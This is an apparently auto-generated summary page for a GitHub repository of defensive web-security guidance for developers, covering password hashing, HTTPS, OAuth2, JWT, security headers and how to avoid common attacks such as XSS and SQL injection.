explaingit

fallibleinc/security-guide-for-developers

21,088Audience · developerComplexity · 1/5QuietSetup · easy

TLDR

A practical security reference guide for web developers covering authentication, encryption, common attacks, and secure coding practices.

Mindmap

mindmap
  root((repo))
    What it covers
      Authentication methods
      Input validation
      Common attacks
      Encryption basics
    Security topics
      HTTPS and transport
      OAuth2 and JWT
      Password storage
      HTTP headers
    For whom
      Beginners learning basics
      Experienced devs needing reminders
    How to use
      Security checklist
      Detailed explanations
      Real-world examples
    Tech guidance
      Python libraries
      Node.js libraries

Things people build with this

USE CASE 1

Review the security checklist before deploying a web application to catch common vulnerabilities.

USE CASE 2

Learn the difference between secure and insecure password hashing methods like bcrypt versus MD5.

USE CASE 3

Understand how to implement two-factor authentication and OAuth2 in your web app.

USE CASE 4

Reference attack patterns like CSRF, XSS, and SQL injection to avoid them in your code.

Tech stack

HTTPSOAuth2JWTbcryptTOTPPythonNode.js

Getting it running

Difficulty · easy Time to first run · 5min
License could not be detected automatically. Check the repository's LICENSE file before use.

In plain English

This is a practical security guide for web developers, written as a work-in-progress reference book. It targets two kinds of developers: those just starting out who may not know the difference between insecure and secure choices (such as MD5 versus bcrypt for password hashing), and experienced developers who know the concepts but sometimes forget to apply them. The guide includes a security checklist as well as detailed explanations. The contents cover a broad range of web security topics organized into chapters: HTTPS and secure transport, authentication methods including two-factor authentication and TOTP, authorization patterns like OAuth2 and JWT, input validation and sanitization, cross-site scripting, injection attacks, encryption and hashing concepts, password policies and storage, session management, security-related HTTP headers, common server configuration mistakes, and specific attack types such as clickjacking, cross-site request forgery, denial of service, and server-side request forgery. It also includes statistics on real-world vulnerabilities, security libraries for Python and Node/JS, and guidance on maintaining good security hygiene over time.

Copy-paste prompts

Prompt 1
I'm building a login system. What does this security guide say about password hashing and two-factor authentication?
Prompt 2
Show me the security checklist from this guide and help me audit my Node.js app against it.
Prompt 3
Explain the difference between OAuth2 and JWT for authentication based on this guide's recommendations.
Prompt 4
What does this guide recommend for preventing cross-site scripting and SQL injection attacks?
Prompt 5
I need to set up HTTPS and secure HTTP headers. What does this guide recommend?
Open on GitHub → Explain another repo

Generated 2026-05-18 · Model: sonnet-4-6 · Verify against the repo before relying on details.